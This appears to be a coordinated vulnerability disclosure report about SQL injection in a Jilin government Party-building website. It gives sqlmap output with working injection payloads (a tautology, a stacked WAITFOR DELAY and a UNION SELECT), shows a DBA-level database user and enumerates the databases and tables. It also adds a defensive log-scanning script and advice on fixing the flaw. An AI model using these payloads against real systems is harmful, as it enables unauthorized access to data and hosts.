2015-12-01: Details reported to the vendor; awaiting vendor handling
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and relevant domain experts
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public
RT (as stated in the title)

The Jilin government-organ Party-building site has multiple SQL injection points, for example:

http://**.**.**.**/SsResult.aspx?wd=2015
http://**.**.**.**/NewsPage.aspx?fid=6450

There are more than these two injection points. The database connection runs with sa privileges, so privilege escalation to the host should be possible; the impact is fairly serious.
sqlmap identified the following injection point(s) with a total of 106 HTTP(s) requests:
---
Parameter: fid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fid=6450 AND 4969=4969

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: fid=6450;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: fid=-5053 UNION ALL SELECT 91,91,91,91,91,91,91,91,CHAR(113)+CHAR(118)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(87)+CHAR(86)+CHAR(75)+CHAR(79)+CHAR(115)+CHAR(108)+CHAR(104)+CHAR(100)+CHAR(104)+CHAR(103)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(113),91,91,91,91,91,91,91,91,91--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: fid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fid=6450 AND 6184=6184

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: fid=6450;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: fid=-8605 UNION ALL SELECT 96,96,96,96,96,96,96,96,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(69)+CHAR(75)+CHAR(100)+CHAR(102)+CHAR(119)+CHAR(77)+CHAR(71)+CHAR(97)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113),96,96,96,96,96,96,96,96,96--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: fid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fid=6450 AND 6184=6184

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: fid=6450;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: fid=-8605 UNION ALL SELECT 96,96,96,96,96,96,96,96,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(98)+CHAR(69)+CHAR(75)+CHAR(100)+CHAR(102)+CHAR(119)+CHAR(77)+CHAR(71)+CHAR(97)+CHAR(70)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(122)+CHAR(113),96,96,96,96,96,96,96,96,96--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'dgw'
current user is DBA: True
available databases [15]:
[*] bcgxj
[*] dgw
[*] GhptSQL
[*] gwgh
[*] hds0670494_db
[*] lll
[*] master
[*] model
[*] msdb
[*] MySqlDb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Z_user
[*] zxqy
A look at the current database:
Database: dgw
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.NewsView       | 35679   |
| dbo.Newstext       | 10435   |
| dbo.PtNewsView     | 6314    |
| dbo.Magazinetext   | 1828    |
| dbo.Table_Tj       | 1483    |
| dbo.text1          | 1011    |
| dbo.DirTable       | 191     |
| dbo.users          | 157     |
| dbo.NewsType       | 126     |
| dbo.Product_S      | 116     |
| dbo.Product_S      | 116     |
| dbo.Ptusers        | 65      |
| dbo.MagazineType   | 53      |
| dbo.Movietable     | 42      |
| dbo.PlTable        | 30      |
| dbo.MainModle      | 23      |
| dbo.Organization_S | 20      |
| dbo.Organization_S | 20      |
| dbo.boss           | 10      |
| dbo.TableQx        | 1       |
+--------------------+---------+
Since this is a government website, I stopped here.
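From the defender's side, the sqlmap output above shows exactly what each of the three techniques leaves in the web server's request log: a numeric tautology (`AND 4969=4969`), a stacked `WAITFOR DELAY` whose execution is visible as a five-second `time-taken`, and a `UNION ALL SELECT` carrying sqlmap's `CHAR()`-concatenated marker string. The script below is an added example, not part of the original report and not the affected site's code. It scans constructed IIS W3C log lines (placeholder client addresses and a reduced field list; the parameter names `fid` and `wd` are the ones from the report) and flags requests matching those shapes. A `WAITFOR` payload whose delay is reflected in the recorded `time-taken` is reported as confirmed, because that means the stacked statement really executed on SQL Server, which is the finding that, combined with the `current user is DBA: True` result, turns a data-exposure bug into a host-compromise risk.

```python
"""Flag sqlmap-style SQL injection probes in IIS W3C log lines.

Added example for this report; the log lines below are constructed
(placeholder IPs, reduced field set) and are not from the affected site.
"""
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample log. IIS stores the query string URL-encoded, so the
# payloads appear with + and %XX escapes; they mirror the shapes sqlmap
# reported above. Client addresses come from documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2015-12-01 10:00:01 GET /NewsPage.aspx fid=6450 203.0.113.5 200 31
2015-12-01 10:00:02 GET /NewsPage.aspx fid=6450+AND+4969%3D4969 203.0.113.5 200 28
2015-12-01 10:00:03 GET /NewsPage.aspx fid=6450%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 203.0.113.5 200 5012
2015-12-01 10:00:04 GET /NewsPage.aspx fid=-5053+UNION+ALL+SELECT+91%2C91%2CCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28106%29%2C91-- 203.0.113.5 200 45
2015-12-01 10:00:05 GET /SsResult.aspx wd=2015 198.51.100.7 200 22
"""

# One signature per technique sqlmap reported against the site.
RULES: Dict[str, "re.Pattern[str]"] = {
    # boolean-based blind: injected tautology such as "AND 4969=4969"
    "boolean_blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    # stacked queries on MSSQL: statement terminator followed by WAITFOR DELAY
    "stacked_timing": re.compile(r";\s*WAITFOR\s+DELAY\b", re.I),
    # UNION-based extraction
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # sqlmap builds its result delimiters from concatenated CHAR() calls
    "char_concat": re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I),
    # trailing SQL comment that discards the rest of the original statement
    "trailing_comment": re.compile(r"--\s*$"),
}

DELAY_RE = re.compile(r"WAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)'", re.I)


@dataclass
class Finding:
    line_no: int
    client_ip: str
    uri_stem: str
    query: str             # decoded query string
    rules: List[str]
    time_taken_ms: int
    delay_confirmed: bool  # WAITFOR delay reflected in server time-taken


def classify(query: str) -> List[str]:
    """Return the names of every rule matching a decoded query string."""
    return [name for name, pat in RULES.items() if pat.search(query)]


def delay_confirmed(query: str, time_taken_ms: int) -> bool:
    """True when a WAITFOR DELAY payload is present and the request took at
    least that long, i.e. the stacked statement actually ran on the DBMS."""
    m = DELAY_RE.search(query)
    if not m:
        return False
    h, mi, s = (int(x) for x in m.groups())
    return time_taken_ms >= (h * 3600 + mi * 60 + s) * 1000


def scan_log(text: str) -> List[Finding]:
    """Parse W3C lines with the reduced field set used in SAMPLE_LOG."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue  # W3C directive or blank line
        fields = line.split()
        if len(fields) != 8:
            continue  # malformed line; a production scanner would log it
        _date, _time, _method, stem, raw_query, client_ip, _status, taken = fields
        query = "" if raw_query == "-" else unquote_plus(raw_query)
        matched = classify(query)
        if matched:
            taken_ms = int(taken)
            findings.append(Finding(line_no, client_ip, stem, query, matched,
                                    taken_ms, delay_confirmed(query, taken_ms)))
    return findings


def hits_per_client(findings: List[Finding]) -> Dict[str, int]:
    """Flagged requests per client IP; an automated scan produces hundreds."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.client_ip] = counts.get(f.client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        tag = " (delay confirmed)" if f.delay_confirmed else ""
        print(f"line {f.line_no}: {f.client_ip} {f.uri_stem} -> {', '.join(f.rules)}{tag}")
    print(hits_per_client(results))
```

Signature matching like this catches the tool's default probes, not a hand-crafted attack, so it belongs alongside the real fix: the `fid` and `wd` values must reach SQL Server only as parameters of a parameterized command, and the application's login should be a low-privilege database user rather than sa, so that a residual injection cannot reach stacked queries against `master` or the host.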
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-12-04 13:23
CNVD confirmed and reproduced the described vulnerability. It has been forwarded through CNCERT to the Jilin branch center, which will coordinate remediation with the unit that administers the website.
None at this time